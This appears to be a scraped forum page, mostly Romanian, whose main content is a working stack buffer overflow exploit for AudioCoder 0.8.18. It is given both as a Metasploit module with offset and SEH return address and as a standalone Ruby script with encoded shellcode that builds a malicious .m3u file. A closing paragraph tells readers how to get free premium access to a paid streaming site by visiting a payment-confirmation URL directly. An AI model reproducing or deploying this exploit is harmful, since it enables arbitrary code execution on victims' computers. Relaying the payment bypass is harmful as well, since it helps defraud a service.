Leaderboard

@ Nort0N = http://www.youtube.com/embed/UGRtDxrmsX4

Metasploit exploit ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote #Rank definition: http://dev.metasploit.com/redmine/projects/framework/wiki/Exploit_Ranking #ManualRanking/LowRanking/AverageRanking/NormalRanking/GoodRanking/GreatRanking/ExcellentRanking Rank = NormalRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'AudioCoder Buffer Overflow Exploit (SEH)', 'Description' => %q{ This module exploits a vulnerability found in AudioCoder 0.8.18 filename handling routine. When supplying a string of input data embedded in a .m3u file, As a result, if this input data is long enough, it can cause a stack-based buffer overflow, which may lead to arbitrary code execution under the context of the user. }, 'License' => MSF_LICENSE, 'Author' => [ 'metacom27[at]gmail.com', # Original discovery 'metacom', # MSF Module 'RST', ], 'References' => [ [ 'OSVDB', '<insert OSVDB number here>' ], [ 'CVE', 'insert CVE number here' ], [ 'URL', '<insert another link to the exploit/advisory here>' ] ], 'DefaultOptions' => { 'ExitFunction' => 'process', #none/process/thread/seh #'InitialAutoRunScript' => 'migrate -f', }, 'Platform' => 'win', 'Payload' => { 'BadChars' => "\x00\x0a\x0d", # <change if needed> 'DisableNops' => true, }, 'Targets' => [ [ 'Windows 7',# Tested on: Windows 7 SP1/SP0 { 'Ret' => 0x660104EE, #libiconv-2.dll 'Offset' => 765 } ], ], 'Privileged' => false, #Correct Date Format: "M D Y" #Month format: Jan,Feb,Mar,Apr,May,Jun,Jul,Aug,Sep,Oct,Nov,Dec 'DisclosureDate' => 'May 01 2013', 'DefaultTarget' => 0)) register_options([OptString.new('FILENAME', [ false, 'The file name.', 'audiocoder.m3u']),], self.class) end def exploit buffer = "http://" buffer << rand_text_alpha_upper(target['Offset']) #junk buffer << generate_seh_record(target.ret) buffer << payload.encoded #2824 bytes of space buffer << rand_text_alpha(5000-buffer.length) # more junk may be needed to trigger the exception print_status("Creating '#{datastore['FILENAME']}'...") file_create(buffer) end end direct-exploit #!/usr/bin/env ruby # Exploit Title:AudioCoder 0.8.18 Buffer Overflow Exploit (SEH) # Download link :http://www.mediacoderhq.com/getfile.htm?site=dl.mediacoderhq.com&file=AudioCoder-0.8.18.exe # Vulnerable Product:AudioCoder # Date (found): 30.04.2013 # Date (publish): 01.05.2013 # RST # Author: metacom # Version: version 0.8.18 # Category: poc # Tested on: windows 7 German begin #calc shellcode = "\x89\xe0\xdb\xc8\xd9\x70\xf4\x5b\x53\x59\x49\x49\x49\x49" + "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" + "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" + "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" + "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4b" + "\x58\x4d\x59\x53\x30\x55\x50\x53\x30\x43\x50\x4d\x59\x5a" + "\x45\x56\x51\x58\x52\x52\x44\x4c\x4b\x50\x52\x56\x50\x4c" + "\x4b\x50\x52\x54\x4c\x4c\x4b\x31\x42\x45\x44\x4c\x4b\x34" + "\x32\x31\x38\x44\x4f\x4f\x47\x51\x5a\x37\x56\x30\x31\x4b" + "\x4f\x50\x31\x49\x50\x4e\x4c\x57\x4c\x35\x31\x33\x4c\x53" + "\x32\x56\x4c\x37\x50\x49\x51\x38\x4f\x54\x4d\x35\x51\x49" + "\x57\x4d\x32\x5a\x50\x36\x32\x36\x37\x4c\x4b\x46\x32\x54" + "\x50\x4c\x4b\x47\x32\x37\x4c\x53\x31\x4e\x30\x4c\x4b\x47" + "\x30\x54\x38\x4b\x35\x49\x50\x42\x54\x51\x5a\x35\x51\x4e" + "\x30\x50\x50\x4c\x4b\x57\x38\x55\x48\x4c\x4b\x36\x38\x31" + "\x30\x45\x51\x59\x43\x4b\x53\x57\x4c\x30\x49\x4c\x4b\x30" + "\x34\x4c\x4b\x55\x51\x4e\x36\x30\x31\x4b\x4f\x50\x31\x49" + "\x50\x4e\x4c\x39\x51\x48\x4f\x34\x4d\x43\x31\x49\x57\x46" + "\x58\x4b\x50\x42\x55\x5a\x54\x43\x33\x43\x4d\x5a\x58\x37" + "\x4b\x33\x4d\x57\x54\x53\x45\x4a\x42\x30\x58\x4c\x4b\x56" + "\x38\x36\x44\x43\x31\x48\x53\x35\x36\x4c\x4b\x54\x4c\x30" + "\x4b\x4c\x4b\x56\x38\x45\x4c\x53\x31\x39\x43\x4c\x4b\x54" + "\x44\x4c\x4b\x35\x51\x4e\x30\x4b\x39\x51\x54\x31\x34\x37" + "\x54\x51\x4b\x51\x4b\x55\x31\x30\x59\x30\x5a\x46\x31\x4b" + "\x4f\x4d\x30\x31\x48\x51\x4f\x50\x5a\x4c\x4b\x42\x32\x4a" + "\x4b\x4b\x36\x51\x4d\x52\x4a\x43\x31\x4c\x4d\x4c\x45\x48" + "\x39\x55\x50\x55\x50\x53\x30\x50\x50\x43\x58\x36\x51\x4c" + "\x4b\x32\x4f\x4d\x57\x4b\x4f\x39\x45\x4f\x4b\x4c\x30\x48" + "\x35\x39\x32\x56\x36\x53\x58\x59\x36\x5a\x35\x4f\x4d\x4d" + "\x4d\x4b\x4f\x38\x55\x57\x4c\x35\x56\x33\x4c\x44\x4a\x4b" + "\x30\x4b\x4b\x4d\x30\x33\x45\x54\x45\x4f\x4b\x50\x47\x42" + "\x33\x33\x42\x42\x4f\x42\x4a\x43\x30\x31\x43\x4b\x4f\x59" + "\x45\x32\x43\x43\x51\x42\x4c\x33\x53\x36\x4e\x43\x55\x43" + "\x48\x55\x35\x43\x30\x41\x41" file = "fuzz.m3u" head = "http://" junk = "\x90" * 765 # Distance to overwrite EIP nseh = "\xEB\x06\x90\x90" # Short (6 bytes) jump! seh = "\xEE\x04\x01\x66" # POP ECX / POP ECX / RETN from libiconv-2.dll nops = "\x90" * 80 textfile = open(file , 'w') textfile.write(head + junk + nseh + seh + nops + shellcode) textfile.close() puts puts " Vulnerable file created!...\n" end

Salut, Turboplay.ro este un site care iti ofera seriale online cu plata,dar ei nu au nici un drept pentru asa ceva. 1.Creaza un cont pe turboplay. 2.Acceseaza http://turboplay.ro/plataok 3.Ai 1 zi premium gratis. Vizionare placuta.